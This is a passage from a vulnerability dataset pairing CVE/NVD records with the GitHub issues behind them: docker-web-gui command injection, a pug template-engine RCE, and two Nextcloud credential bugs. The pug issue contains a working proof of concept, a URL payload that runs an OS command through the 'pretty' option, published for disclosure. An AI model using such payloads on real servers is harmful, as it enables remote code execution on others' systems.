2) have a list of allowed commands such as start/stop, etc. Ensure this simple validation routine validates the user input before concatenating parameters and calling `Terminal(cmd)` or in [terminal.js](https://github.com/rakibtg/docker-web-gui/blob/642dd12c6e6e9ced64e17e1cf20756f6573171a7/backend/utilities/terminal.js#L4) itself. Return a "bad parameter" error message if the validation doesn't pass.
**Additional references for hardening the code**
- https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
- https://owasp.org/www-community/attacks/Command_Injection | Security: lack of input validation in APIs leads to command injection | https://api.github.com/repos/rakibtg/docker-web-gui/issues/23/comments | 5 | 2021-01-31T02:00:31Z | 2021-03-02T08:10:35Z | https://github.com/rakibtg/docker-web-gui/issues/23 | 797,597,769 | 23 | 1,730 |
CVE-2021-21353 | 2021-03-03T02:15:13.143 | Pug is an npm package which is a high-performance template engine. In pug before version 3.0.1, if a remote attacker was able to control the `pretty` option of the pug compiler, e.g. if you spread a user provided object such as the query parameters of a request into the pug template inputs, it was possible for them to achieve remote code execution on the node.js backend. This is fixed in version 3.0.1. This advisory applies to multiple pug packages including "pug", "pug-code-gen". pug-code-gen has a backported fix at version 2.0.3. This advisory is not exploitable if there is no way for un-trusted input to be passed to pug as the `pretty` option, e.g. if you compile templates in advance before applying user input to them, you do not need to upgrade. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/commit/991e78f7c4220b2f8da042877c6f0ef5a4683be0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/issues/3312"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/pull/3314"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/releases/tag/pug%403.0.1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/security/advisories/GHSA-p493-635q-r6gr"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.npmjs.com/package/pug"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.npmjs.com/package/pug-code-gen"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/commit/991e78f7c4220b2f8da042877c6f0ef5a4683be0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/issues/3312"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/pull/3314"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/releases/tag/pug%403.0.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pugjs/pug/security/advisories/GHSA-p493-635q-r6gr"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.npmjs.com/package/pug"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.npmjs.com/package/pug-code-gen"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pugjs:pug:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "AE43CE50-8DE8-4487-BCCB-9E3931241EB2",
"versionEndExcluding": "3.0.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pugjs:pug-code-gen:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "F0CD8CA7-F670-4B0A-9639-E7D60F401DBB",
"versionEndExcluding": "2.0.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pugjs:pug-code-gen:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "55FCB9F1-8C93-474D-9137-CB14C8F9F05E",
"versionEndExcluding": "3.0.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"74"
] | 74 | https://github.com/pugjs/pug/issues/3312 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pugjs",
"pug"
] | Hello,
I found that pug may allow an attacker to inject arbitrary javascript code if an attacker can control `options.pretty`.
**Pug Version:** 3.0.0
## Proof of concept
Here is an vulnerable example including 2 files: **app.js** and **index.pug**.
In the example, there is only one variable "pretty" that is controlled by user, and the variable is not used in any dangerous functions.
**app.js**
```javascript
const express = require('express')
const app = express()
app.set('view engine', 'pug')
app.get('/', function (req, res) {
res.render('index', { pretty: req.query.p })
})
app.listen(5000)
```
**views/index.pug**
```
html
head
body
mixin print(text)
p= text
+print('Hello, world')
```
But if we visit URL below, it would lead to execute OS command "whoami".
```
http://localhost:5000/?p=');process.mainModule.constructor._load('child_process').exec('whoami');_=('
```
## Detail
This section will point the location of vulnerability and explain why I assume it's an issue.
First of all, when Compiler object is initialized, `options.pretty` would be saved in `this.pp`.
https://github.com/pugjs/pug/blob/06baa525a23049756de9587461d389a12bc12537/packages/pug-code-gen/index.js#L50-L56
The `visitMixinBlock` function is simple, `this.pp` is pushed into `this.buf` array which stores the compiled code of template without any sanitization.
**visitMixinBlock:**
https://github.com/pugjs/pug/blob/06baa525a23049756de9587461d389a12bc12537/packages/pug-code-gen/index.js#L452-L459
The `visitMixin` is basically same as `visitMixinBlock`, `this.pp` is pushed without any sanitization at line 507.
**visitMixin**:
https://github.com/pugjs/pug/blob/06baa525a23049756de9587461d389a12bc12537/packages/pug-code-gen/index.js#L487-L508
If we look at how other functions handle options variables, we can see that they are all sanitized by stringify.
( this.prettyIndent is implemented with this.buffer, and this.buffer always sanitizes variable with stringify. )
with `this.prettyIndent`:
https://github.com/pugjs/pug/blob/06baa525a23049756de9587461d389a12bc12537/packages/pug-code-gen/index.js#L427
with `this.buffer`:
https://github.com/pugjs/pug/blob/06baa525a23049756de9587461d389a12bc12537/packages/pug-code-gen/index.js#L475
with `stringify`:
https://github.com/pugjs/pug/blob/06baa525a23049756de9587461d389a12bc12537/packages/pug-code-gen/index.js#L148
<br />
The **visitMixin** and **visitMixinBlock** are the only two functions I found that are missing sanitization.
I think it may be an issue.
| Code injection vulnerability in visitMixin and visitMixinBlock through "pretty" option | https://api.github.com/repos/pugjs/pug/issues/3312/comments | 4 | 2021-02-10T06:17:12Z | 2021-04-17T22:42:32Z | https://github.com/pugjs/pug/issues/3312 | 805,211,096 | 3,312 | 1,731 |
CVE-2020-8296 | 2021-03-03T18:15:13.847 | Nextcloud Server prior to 20.0.0 stores passwords in a recoverable format even when external storage is not configured. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "support@hackerone.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nextcloud/server/issues/17439"
},
{
"source": "support@hackerone.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nextcloud/server/pull/21037"
},
{
"source": "support@hackerone.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/867164"
},
{
"source": "support@hackerone.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L6BO6P6MP2MOWA6PZRXX32PLWPXN5O4S/"
},
{
"source": "support@hackerone.com",
"tags": [
"Vendor Advisory"
],
"url": "https://nextcloud.com/security/advisory/?id=NC-SA-2021-006"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nextcloud/server/issues/17439"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nextcloud/server/pull/21037"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/867164"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L6BO6P6MP2MOWA6PZRXX32PLWPXN5O4S/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://nextcloud.com/security/advisory/?id=NC-SA-2021-006"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "00443127-F3B3-47FF-AC22-4B9BF23CCD4A",
"versionEndExcluding": "20.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"521"
] | 521 | https://github.com/nextcloud/server/issues/17439 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nextcloud",
"server"
] | Hi,
Can i get informations about the algorithm used to hash password inside oc_credentials.
I think this is synchronous hash because nextcloud need it with external storage but i’m not sure ?
Best regards
| Oc_credentials security? | https://api.github.com/repos/nextcloud/server/issues/17439/comments | 13 | 2019-10-07T11:19:59Z | 2020-05-19T10:09:23Z | https://github.com/nextcloud/server/issues/17439 | 503,388,023 | 17,439 | 1,732 |
CVE-2021-22877 | 2021-03-03T18:15:14.707 | A missing user check in Nextcloud prior to 20.0.6 inadvertently populates a user's own credentials for other users external storage configuration when not already configured yet. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "support@hackerone.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nextcloud/server/issues/24600"
},
{
"source": "support@hackerone.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nextcloud/server/pull/25224"
},
{
"source": "support@hackerone.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1061591"
},
{
"source": "support@hackerone.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L6BO6P6MP2MOWA6PZRXX32PLWPXN5O4S/"
},
{
"source": "support@hackerone.com",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "https://nextcloud.com/security/advisory/?id=NC-SA-2021-004"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nextcloud/server/issues/24600"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nextcloud/server/pull/25224"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1061591"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L6BO6P6MP2MOWA6PZRXX32PLWPXN5O4S/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "https://nextcloud.com/security/advisory/?id=NC-SA-2021-004"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6FEA4E5F-306F-4E45-AB46-C232BCB0F4EB",
"versionEndExcluding": "20.0.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"862"
] | 862 | https://github.com/nextcloud/server/issues/24600 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nextcloud",
"server"
] | <!--
Thanks for reporting issues back to Nextcloud!
Note: This is the **issue tracker of Nextcloud**, please do NOT use this to get 4answers to your questions or get help for fixing your installation. This is a place to report bugs to developers, after your server has been debugged. You can find help debugging your system on our home user forums: https://help.nextcloud.com or, if you use Nextcloud in a large organization, ask our engineers on https://portal.nextcloud.com. See also https://nextcloud.com/support for support options.
Nextcloud is an open source project backed by Nextcloud GmbH. Most of our volunteers are home users and thus primarily care about issues that affect home users. Our paid engineers prioritize issues of our customers. If you are neither a home user nor a customer, consider paying somebody to fix your issue, do it yourself or become a customer.
Guidelines for submitting issues:
* Please search the existing issues first, it's likely that your issue was already reported or even fixed.
- Go to https://github.com/nextcloud and type any word in the top search/command bar. You probably see something like "We couldn’t find any repositories matching ..." then click "Issues" in the left navigation.
- You can also filter by appending e. g. "state:open" to the search string.
- More info on search syntax within github: https://help.github.com/articles/searching-issues
* This repository https://github.com/nextcloud/server/issues is *only* for issues within the Nextcloud Server code. This also includes the apps: files, encryption, external storage, sharing, deleted files, versions, LDAP, and WebDAV Auth
* SECURITY: Report any potential security bug to us via our HackerOne page (https://hackerone.com/nextcloud) following our security policy (https://nextcloud.com/security/) instead of filing an issue in our bug tracker.
* The issues in other components should be reported in their respective repositories: You will find them in our GitHub Organization (https://github.com/nextcloud/)
* You can also use the Issue Template app to prefill most of the required information: https://apps.nextcloud.com/apps/issuetemplate
-->
<!--- Please keep this note for other contributors -->
Hello!
I am using Nextcloud 20.0.2 (docker) with LDAP + external storage and several **external SMB mounts** (all with "credentials saved in database" enabled).
It seems that the credentials saved in the corrspondeing table (`oc_storages_credentials`) are wrong and therefore all SMB shares are showing errors.
When I initially add the external storage SMB mounts in the settings and then a user logs in the first time, the SMB shares work (with the correct login) which gets correctly saved in the DB.
Afterwards I can find one single entry on the `oc_storages_credentials`-table
However, when I (as an admin) navigate to: `https://cloud.example.org/settings/users` the table `oc_storages_credentials` gets (pre)populated with all the users (and some random credentials) - this also includes all users who weren´t logged-in yet. When the user logs in afterwards the credentials entry is already there and does not get updated.
### Steps to reproduce
1. Add external SMB mount with option "credentials saved in database"
2. Manually check the MYSQL table `oc_storages_credentials` - it should be empty
3. As an admin: navigate to (`/settings/users`)
4. Recheck the MYSQL table `oc_storages_credentials` - there is an entry for every user now
5. Login as new user and try to access a SMB share - access denied.
### Expected behaviour
1. Do not populate the table `oc_storages_credentials` on "user list settings page"
2. If the current user credentials does not match the ones in the DB -> update it
### Actual behaviour
- `password::logincredentials/credentials` entries are getting deployed initially from the admin user ...
### Debugging results
In the file `Files_External\Lib\Auth\Password\LoginCredentials.php`:
When I output the `$sessionCredentials->getLoginName()` on each request I get two results:
- for the admin user listing all users on the settings page: there is a full browser page with binary crap printed.
- while logged in with the specific user it prints the actual loginame of that user
### Bugfix (Dirty)
When I change `line 77 in Files_External\Lib\Auth\Password\LoginCredentials.php`:
from `if (is_null($credentials))` to `if (\OC::$server->getUserSession()->isLoggedIn())` it works correctly.
With thix change the credentials gets stored on every request and therefore the wrong (initialized) ones getting overwritten.
It looks like there is some impersonation going on here.
### Server configuration
I am using this docker image (no modifications): https://github.com/nextcloud/docker/tree/master/.examples/dockerfiles/full/fpm-alpine
**Operating system:** Docker on Ubuntu 20.04.1 LTS
**Web server:** nginx with php-fpm
**Database:** mariadb 10.5 as docker container
**PHP version:** 7php .4
**Nextcloud version:** 20.0.2
**Updated from an older Nextcloud/ownCloud or fresh install:** updated from nextcloud 18.0.11 -> 19.0 -> 20.0.2 (in one go)
**Where did you install Nextcloud from:**
**Signing status:**
<details>
<summary>Signing status</summary>
```
No errors have been found.
```
</details>
**List of activated apps:**
<details>
<summary>App list</summary>
Enabled:
- accessibility: 1.6.0
- activity: 2.13.3
- cloud_federation_api: 1.3.0
- comments: 1.10.0
- dav: 1.16.1
- drawio: 0.9.8
- external: 3.7.1
- extract: 1.2.5
- federatedfilesharing: 1.10.1
- federation: 1.10.1
- files: 1.15.0
- files_external: 1.11.1
- files_linkeditor: 1.1.3
- files_pdfviewer: 2.0.1
- files_rightclick: 0.17.0
- files_sharing: 1.12.0
- files_trashbin: 1.10.1
- files_versions: 1.13.0
- files_videoplayer: 1.9.0
- logreader: 2.5.0
- lookup_server_connector: 1.8.0
- metadata: 0.12.0
- notifications: 2.8.0
- oauth2: 1.8.0
- photos: 1.2.0
- provisioning_api: 1.10.0
- ransomware_protection: 1.8.0
- settings: 1.2.0
- sharebymail: 1.10.0
- socialsharing_email: 2.1.0
- text: 3.1.0
- theming: 1.11.0
- theming_customcss: 1.7.0
- twofactor_backupcodes: 1.9.0
- twofactor_nextcloud_notification: 3.0.0
- twofactor_totp: 5.0.0
- twofactor_u2f: 6.0.0
- updatenotification: 1.10.0
- user_ldap: 1.10.2
- viewer: 1.4.0
- workflowengine: 2.2.0
Disabled:
- admin_audit
- contactsinteraction
- dashboard
- encryption
- firstrunwizard
- nextcloud_announcements
- password_policy
- privacy
- recommendations
- serverinfo
- spreed
- support
- survey_client
- systemtags
- user_status
- weather_status
</details>
**Nextcloud configuration:**
<details>
<summary>Config report</summary>
```
{
"system": {
"memcache.local": "\\OC\\Memcache\\APCu",
"apps_paths": [
{
"path": "\/var\/www\/html\/apps",
"url": "\/apps",
"writable": false
},
{
"path": "\/var\/www\/html\/custom_apps",
"url": "\/custom_apps",
"writable": true
}
],
"memcache.distributed": "\\OC\\Memcache\\Redis",
"memcache.locking": "\\OC\\Memcache\\Redis",
"instanceid": "***REMOVED SENSITIVE VALUE***",
"passwordsalt": "***REMOVED SENSITIVE VALUE***",
"secret": "***REMOVED SENSITIVE VALUE***",
"trusted_domains": [
"cloud.example.org"
],
"trusted_proxies": "***REMOVED SENSITIVE VALUE***",
"forwarded_for_headers": [
"HTTP_X_FORWARDED_FOR"
],
"datadirectory": "***REMOVED SENSITIVE VALUE***",
"dbtype": "mysql",
"version": "20.0.2.2",
"overwrite.cli.url": "https:\/\/cloud.example.org",
"overwriteprotocol": "https",
"overwritehost": "cloud.example.org",
"dbname": "***REMOVED SENSITIVE VALUE***",
"dbhost": "***REMOVED SENSITIVE VALUE***",
"dbport": "",
"dbtableprefix": "oc_",
"mysql.utf8mb4": true,
"dbuser": "***REMOVED SENSITIVE VALUE***",
"dbpassword": "***REMOVED SENSITIVE VALUE***",
"installed": true,
"ldapIgnoreNamingRules": false,
"ldapProviderFactory": "OCA\\User_LDAP\\LDAPProviderFactory",
"default_language": "de",
"force_language": "de",
"default_locale": "de_AT",
"force_locale": "de_AT",
"skeletondirectory": false,
"simpleSignUpLink.shown": false,
"auth.bruteforce.protection.enabled": false,
"twofactor_enforced": "true",
"twofactor_enforced_groups": [
"admin"
],
"twofactor_enforced_excluded_groups": [],
"updater.release.channel": "stable",
"lost_password_link": "https:\/\/account.example.org\/",
"loglevel": 3,
"maintenance": false,
"redis": {
"host": "***REMOVED SENSITIVE VALUE***",
"password": "***REMOVED SENSITIVE VALUE***",
"port": 6379
},
"mail_smtpmode": "smtp",
"mail_smtphost": "***REMOVED SENSITIVE VALUE***",
"mail_smtpport": "25",
"mail_smtpauthtype": "LOGIN",
"mail_from_address": "***REMOVED SENSITIVE VALUE***",
"mail_domain": "***REMOVED SENSITIVE VALUE***",
"mail_sendmailmode": "smtp",
"mail_smtpauth": 1,
"mail_smtpname": "***REMOVED SENSITIVE VALUE***",
"mail_smtppassword": "***REMOVED SENSITIVE VALUE***",
"mail_smtpsecure": "tls",
"theme": "",
"data-fingerprint": "80b0cc4ffe12fed9a53adc96d893708e"
},
"apps": {
"accessibility": {
"enabled": "yes",
"installed_version": "1.6.0",
"types": ""
},
"activity": {
"enable_email": "no",
"enabled": "yes",
"installed_version": "2.13.3",
"notify_email_calendar": "0",
"notify_email_calendar_event": "0",
"notify_email_calendar_todo": "0",
"notify_email_comments": "0",
"notify_email_favorite": "0",
"notify_email_file_changed": "0",
"notify_email_file_created": "0",
"notify_email_file_deleted": "0",
"notify_email_file_favorite_changed": "0",
"notify_email_file_restored": "0",
"notify_email_public_links": "0",
"notify_email_remote_share": "0",
"notify_email_shared": "0",
"notify_email_systemtags": "0",
"notify_notification_calendar": "0",
"notify_notification_calendar_event": "0",
"notify_notification_calendar_todo": "0",
"notify_notification_comments": "0",
"notify_notification_favorite": "0",
"notify_notification_file_changed": "0",
"notify_notification_file_favorite_changed": "0",
"notify_notification_group_settings": "1",
"notify_notification_personal_settings": "1",
"notify_notification_public_links": "0",
"notify_notification_remote_share": "0",
"notify_notification_security": "1",
"notify_notification_shared": "0",
"notify_notification_twofactor_totp": "1",
"notify_notification_twofactor_u2f": "1",
"notify_setting_batchtime": "3600",
"notify_setting_self": "0",
"notify_setting_selfemail": "0",
"notify_stream_calendar": "1",
"notify_stream_calendar_event": "1",
"notify_stream_calendar_todo": "1",
"notify_stream_comments": "1",
"notify_stream_favorite": "1",
"notify_stream_file_changed": "1",
"notify_stream_file_created": "1",
"notify_stream_file_deleted": "1",
"notify_stream_file_favorite": "0",
"notify_stream_file_restored": "1",
"notify_stream_public_links": "1",
"notify_stream_remote_share": "1",
"notify_stream_shared": "1",
"notify_stream_systemtags": "1",
"types": "filesystem"
},
"admin_audit": {
"enabled": "no",
"installed_version": "1.10.0",
"types": "logging"
},
"backgroundjob": {
"lastjob": "203"
},
"breezedark": {
"enabled": "no",
"installed_version": "18.0.12",
"types": ""
},
"bruteforcesettings": {
"enabled": "no",
"installed_version": "1.6.0",
"types": ""
},
"calendar": {
"enabled": "no",
"installed_version": "2.1.2",
"types": ""
},
"cloud_federation_api": {
"enabled": "yes",
"installed_version": "1.3.0",
"types": "filesystem"
},
"comments": {
"enabled": "yes",
"installed_version": "1.10.0",
"types": "logging"
},
"contactsinteraction": {
"enabled": "no",
"installed_version": "1.1.0",
"types": "dav"
},
"core": {
"backgroundjobs_mode": "cron",
"default_encryption_module": "OC_DEFAULT_MODULE",
"enterpriseLogoChecked": "yes",
"installed.bundles": "[\"CoreBundle\"]",
"installedat": "1587561481.299",
"lastcron": "1607375700",
"lastupdateResult": "[]",
"lastupdatedat": "1607315700",
"oc.integritycheck.checker": "[]",
"public_files": "files_sharing\/public.php",
"public_webdav": "dav\/appinfo\/v1\/publicwebdav.php",
"shareapi_allow_group_sharing": "yes",
"shareapi_allow_public_upload": "yes",
"shareapi_allow_resharing": "yes",
"shareapi_allow_share_dialog_user_enumeration": "yes",
"shareapi_default_expire_date": "yes",
"shareapi_default_internal_expire_date": "yes",
"shareapi_enable_link_password_by_default": "no",
"shareapi_enabled": "yes",
"shareapi_exclude_groups": "no",
"shareapi_exclude_groups_list": "[\"\"]",
"shareapi_expire_after_n_days": "60",
"shareapi_internal_enforce_expire_date": "no",
"shareapi_internal_expire_after_n_days": "90",
"theming.variables": "a68415316c50f236d52de756db4b7262",
"updater.secret.created": "1593261797",
"vendor": "nextcloud"
},
"dashboard": {
"enabled": "no",
"installed_version": "7.0.0",
"types": ""
},
"dav": {
"buildCalendarReminderIndex": "yes",
"buildCalendarSearchIndex": "yes",
"chunks_migrated": "1",
"enabled": "yes",
"installed_version": "1.16.1",
"regeneratedBirthdayCalendarsForYearFix": "yes",
"types": "filesystem"
},
"deck": {
"enabled": "no",
"installed_version": "0.8.2",
"types": "dav"
},
"drawio": {
"DrawioLang": "auto",
"DrawioOffline": "no",
"DrawioTheme": "kennedy",
"DrawioUrl": "https:\/\/www.draw.io",
"DrawioXml": "yes",
"enabled": "yes",
"installed_version": "0.9.8",
"types": "filesystem"
},
"encryption": {
"enabled": "no",
"installed_version": "2.6.0",
"masterKeyId": "master_66b7a0f5",
"publicShareKeyId": "pubShare_66b7a0f5",
"recoveryKeyId": "recoveryKey_66b7a0f5",
"types": "filesystem"
},
"external": {
"enabled": "yes",
"installed_version": "3.7.1",
"max_site": "3",
"sites": "***REMOVED SENSITIVE VALUE***",
"types": ""
},
"extract": {
"enabled": "yes",
"installed_version": "1.2.5",
"types": ""
},
"federatedfilesharing": {
"enabled": "yes",
"installed_version": "1.10.1",
"types": ""
},
"federation": {
"enabled": "yes",
"installed_version": "1.10.1",
"types": "authentication"
},
"files": {
"cronjob_scan_files": "500",
"default_quota": "10 GB",
"enabled": "yes",
"installed_version": "1.15.0",
"types": "filesystem"
},
"files_external": {
"allow_user_mounting": "no",
"enabled": "yes",
"installed_version": "1.11.1",
"types": "filesystem",
